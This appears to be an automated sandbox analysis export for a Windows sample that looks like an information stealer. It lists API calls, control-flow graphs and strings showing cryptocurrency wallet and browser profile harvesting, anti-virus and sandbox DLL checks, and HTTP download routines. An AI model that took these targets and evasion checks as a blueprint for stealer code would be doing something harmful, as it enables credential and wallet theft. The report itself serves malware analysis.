                                                                                                                                                                                                                                                                                      control_flow_graph 3588 401730-401765 call 4101c0 * 2 3593 401767-40176a 3588->3593 3594 40177a-401782 3588->3594 3595 401784-40178a 3593->3595 3596 40176c-40176e 3593->3596 3597 40178c-4017b8 call 411550 call 4102e0 call 410290 call 410230 * 2 3594->3597 3595->3597 3598 401770-401778 3596->3598 3599 4017bd-4017c4 3596->3599 3597->3599 3598->3597 3601 401834-4018b3 call 4102e0 call 410340 call 4102e0 call 410340 call 4102e0 call 410290 call 410230 * 4 3599->3601 3602 4017c6-40182f call 4102e0 call 410340 call 4102e0 call 410340 call 410290 call 410230 * 3 3599->3602 3643 4018b6-4018df call 410230 call 410530 FindFirstFileA 3601->3643 3602->3643 3652 4021f2-402245 call 410230 * 9 3643->3652 3653 4018e5-4018fd 3643->3653 3689 402248-402260 _invalid_parameter_noinfo_noreturn 3652->3689 3655 401933-401967 call 402400 3653->3655 3660 401980 3655->3660 3661 401969-40197a strlen 3655->3661 3663 401982-401991 3660->3663 3661->3663 3665 4019d0-4019d4 3663->3665 3666 401993-4019a0 3663->3666 3668 401aa7-401ab3 3665->3668 3669 4019da-401a02 call 402400 3665->3669 3670 4019a2 3666->3670 3671 4019a8-4019bb memcmp 3666->3671 3674 401ab5-401ac7 3668->3674 3675 401afb-401afd 3668->3675 3685 401a04-401a15 strlen 3669->3685 3686 401a17 3669->3686 3670->3671 3671->3669 3676 4019bd-4019bf 3671->3676 3679 401af2-401af8 ??3@YAXPAX@Z 3674->3679 3680 401ac9-401acb 3674->3680 3681 401b03-401b16 call 4101c0 3675->3681 3682 40191b-40192d FindNextFileA 3675->3682 3676->3669 3683 4019c1-4019c3 3676->3683 3679->3675 3688 401ad1-401ad6 3680->3688 3680->3689 3706 401eb5-401f4e call 4102e0 call 410340 call 4102e0 call 410340 * 2 call 410290 call 410230 * 5 call 410200 call 411520 3681->3706 3707 401b1c-401be2 call 4102e0 call 410340 call 4102e0 call 410340 * 3 call 4102e0 call 410230 * 6 call 410530 FindFirstFileA 3681->3707 3682->3655 3687 4021c1-4021dd FindClose call 4104e0 * 2 3682->3687 3683->3668 3691 4019c9 3683->3691 3693 401a19-401a25 3685->3693 3686->3693 3687->3652 3688->3689 3694 401adc-401ae1 3688->3694 3703 402363-4023c3 call 410200 * 4 call 401480 3689->3703 3704 402266-402285 3689->3704 3691->3669 3700 401a27-401a2e 3693->3700 3701 401a48-401a4f 3693->3701 3694->3689 3702 401ae7-401aea 3694->3702 3711 401a30 3700->3711 3712 401a33-401a46 memcmp 3700->3712 3714 401a51-401a54 3701->3714 3715 401a57-401a62 3701->3715 3702->3689 3713 401af0 3702->3713 3765 4023c8-4023f0 call 410230 * 4 3703->3765 3716 402290-40234b call 410200 * 7 call 401730 3704->3716 3816 401913-401918 call 410230 3706->3816 3817 401f54-401fe7 call 4101c0 call 410340 * 2 call 4102e0 call 410340 call 410290 call 410230 * 4 3706->3817 3823 401be8-401beb 3707->3823 3824 4021df-4021ef call 410230 * 2 3707->3824 3711->3712 3712->3701 3712->3715 3713->3679 3714->3715 3715->3668 3723 401a64-401a73 3715->3723 3794 402350-40235d 3716->3794 3730 401a75-401a77 3723->3730 3731 401a9e-401aa4 ??3@YAXPAX@Z 3723->3731 3730->3689 3737 401a7d-401a82 3730->3737 3731->3668 3737->3689 3744 401a88-401a8d 3737->3744 3744->3689 3745 401a93-401a96 3744->3745 3745->3689 3752 401a9c 3745->3752 3752->3731 3794->3703 3794->3716 3816->3682 3868 402001-4020e6 call 410340 call 410290 call 410230 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 3817->3868 3869 401fe9-401ffc call 410340 call 410290 call 410230 3817->3869 3827 401c4a-401c9b call 410340 * 2 call 410290 call 410230 * 2 call 410200 call 411520 3823->3827 3824->3652 3860 401c9d-401e0f call 4101c0 call 410340 * 2 call 4102e0 call 410340 call 410290 call 410230 * 4 call 410340 call 410290 call 410230 call 4101c0 call 410340 call 4102e0 call 410340 call 4113b0 call 4102e0 call 410290 call 410230 * 5 call 410530 * 2 CopyFileA call 410200 call 4076b0 3827->3860 3861 401c2f-401c44 FindNextFileA 3827->3861 3995 401bf0-401c2a call 410530 DeleteFileA call 4104e0 * 2 call 411250 call 410230 * 2 3860->3995 3996 401e15-401eb0 call 410200 * 5 call 413e50 call 410230 3860->3996 3861->3827 3864 401900-401910 FindClose call 410230 3861->3864 3864->3816 3953 402181-4021ba call 410530 DeleteFileA call 4104e0 * 2 call 411250 call 410230 3868->3953 3954 4020ec-40217c call 410200 * 5 call 413e50 call 410230 3868->3954 3869->3868 3953->3687 3954->3953 3995->3861 3996->3995
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,00000028,00000028,00000028,P#@,?,00420BBE,?,?,?,00420BBE,P#@,?,00000028,00000028,?), ref: 004018D4
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 00401970
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: FileFindFirstlstrcpystrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$P#@$P#@$Wallets$\*.*
                                                                                                                                                                                                                                                                                      • API String ID: 2655114730-2645412951
                                                                                                                                                                                                                                                                                      • Opcode ID: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                      • Instruction ID: f6b8f89bdbb38ad25dbe9b200cedc7393f8838c2c48d913623183ff2efa6fcc7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0392e0cbbb74c3f63e79c827141e62e095c897f05b3910d11131e3b73294b9ba
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C572B931A102185BCF14EBA1CD959EEB779AF44304F40409EF9066B192DF7CAEC5CBA9
                                                                                                                                                                                                                                                                                      Function 0040A5D0 Relevance: 32.0, APIs: 7, Strings: 11, Instructions: 509filestringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,\*.*,?,?,0042150A), ref: 0040A63D
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040A738
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcat$FileFindFirstlstrlenmemmovestrlen
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$CURRENT$IndexedDB$Local Extension Settings$Opera$Plugins$Sync Extension Settings$Wallets$\*.*$_0.indexeddb.leveldb$chrome-extension_
                                                                                                                                                                                                                                                                                      • API String ID: 1425610001-450108884
                                                                                                                                                                                                                                                                                      • Opcode ID: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                      • Instruction ID: 1a3cb996083095315d2ff66196e58a8cf7e0966e26cbd8d21691459e5d96898c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 139ffd1411e68c882e5f60f44f434026bf7f517aa634323aadea9402351866cf
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 841243316102589BCB14EBA1CD95AEE7779AF54308F40009EF5066B182DFBC6EC5CBA9
                                                                                                                                                                                                                                                                                      Function 0040C790 Relevance: 30.4, APIs: 13, Strings: 4, Instructions: 614stringfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcpyA.KERNEL32(00000000,00000000,?,?,?,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 00410320
                                                                                                                                                                                                                                                                                        • Part of subcall function 004102E0: lstrcatA.KERNEL32(00000000,?,?,00417585,?,?,?,C:\ProgramData\,0042150A,?,?,0000000C), ref: 0041032A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrlenA.KERNEL32(?,?,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410359
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcpyA.KERNEL32(00000000,00000000,00000001,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 00410382
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410340: lstrcatA.KERNEL32(00000000,?,?,?,004172A5,?,00420AD0,0042150A,?,?,?,?,00418606), ref: 0041038A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410290: lstrcpyA.KERNEL32(00000000,?,?,?,?,004172C1,?,?,00000000,?,00420AD0,0042150A), ref: 004102C8
                                                                                                                                                                                                                                                                                      • FindFirstFileA.KERNEL32(00000000,?,?,?,0042119A,?,?,0042150A), ref: 0040C80A
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,76EC5E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040C893
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 0040C8C2
                                                                                                                                                                                                                                                                                      • strlen.MSVCRT ref: 0040C91D
                                                                                                                                                                                                                                                                                      • memcmp.MSVCRT(00000000,00000000,00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C94B
                                                                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,0042113D,00000002,?,?,?,00000001), ref: 0040C9AE
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcpy$lstrcatmemcmpstrlen$??3@FileFindFirstlstrlenmemmove
                                                                                                                                                                                                                                                                                      • String ID: C:\ProgramData\$\..\$prefs.js$profiles.ini
                                                                                                                                                                                                                                                                                      • API String ID: 3809920955-2608480989
                                                                                                                                                                                                                                                                                      • Opcode ID: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                      • Instruction ID: 416ba331a07f3905739cc071a47e34269f16b80876d8e7813359335a266a51ee
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b82d6e280c7ec2f173d30f79c5aac1989165e53126787770b6279d5565a2d5f3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4932D7319002189BCB14EBB1C9D5AEEB778BF48304F40455EF41667192DF7CAAC9CBA9
                                                                                                                                                                                                                                                                                      Function 004011F0 Relevance: 25.6, APIs: 6, Strings: 11, Instructions: 110stringCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,avghookx.dll,?,?,?,004185FC), ref: 0040121E
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,avghooka.dll,?,?,?,004185FC), ref: 0040124E
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,snxhk.dll,?,?,?,004185FC), ref: 0040127E
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,sbiedll.dll,?,?,?,004185FC), ref: 004012AE
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,api_log.dll,?,?,?,004185FC), ref: 004012DE
                                                                                                                                                                                                                                                                                        • Part of subcall function 004011B0: lstrcmpiW.KERNEL32(?,?,7591F360,?,?,?,00401320,pstorec.dll,?,?,?,004185FC), ref: 004011DA
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,dir_watch.dll,?,?,?,004185FC), ref: 0040130E
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3275913936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276066539.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276129797.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3276190906.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.3277535270.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_gVKsiQIHqe.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: lstrcmpi
                                                                                                                                                                                                                                                                                      • String ID: api_log.dll$avghooka.dll$avghookx.dll$cmdvrt32.dll$cmdvrt64.dll$dir_watch.dll$pstorec.dll$sbiedll.dll$snxhk.dll$vmcheck.dll$wpespy.dll
                                                                                                                                                                                                                                                                                      • API String ID: 1586166983-3272603366
                                                                                                                                                                                                                                                                                      • Opcode ID: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                      • Instruction ID: 41c0b1b83a52b27a2bdfeff9d3ed397a321de4e9cb8fcf5d4a551c39b82ef4d0
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b3d858f19f8d577d2ca6532e9e1bf2584ef083a26a7cebbf2994b5fa81393a97
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D431AD323413509BCB119B05C8C0F253362AF99B98FAE01F6E902BB7B7D27C9C41865D
                                                                                                                                                                                                                                                                                      Function 00404280 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 173networkfileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                        • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                        • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                      • InternetOpenA.WININET ref: 004042E1
                                                                                                                                                                                                                                                                                      • StrCmpCA.SHLWAPI(?,https), ref: 004042F4
                                                                                                                                                                                                                                                                                      • InternetConnectA.WININET ref: 0040432D
                                                                                                                                                                                                                                                                                      • HttpOpenRequestA.WININET(00000000,GET,?,HTTP/1.1,00000000,00000000,00000000,00000000), ref: 00404360
                                                                                                                                                                                                                                                                                      • InternetSetOptionA.WININET(00000000,0000001F,FFFFFFFF,00000004), ref: 00404387
                                                                                                                                                                                                                                                                                      • HttpSendRequestA.WININET ref: 0040439B
                                                                                                                                                                                                                                                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 004043B3
                                                                                                                                                                                                                                                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 004043F0
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 0040446D
                                                                                                                                                                                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 00404478
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3275974371.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
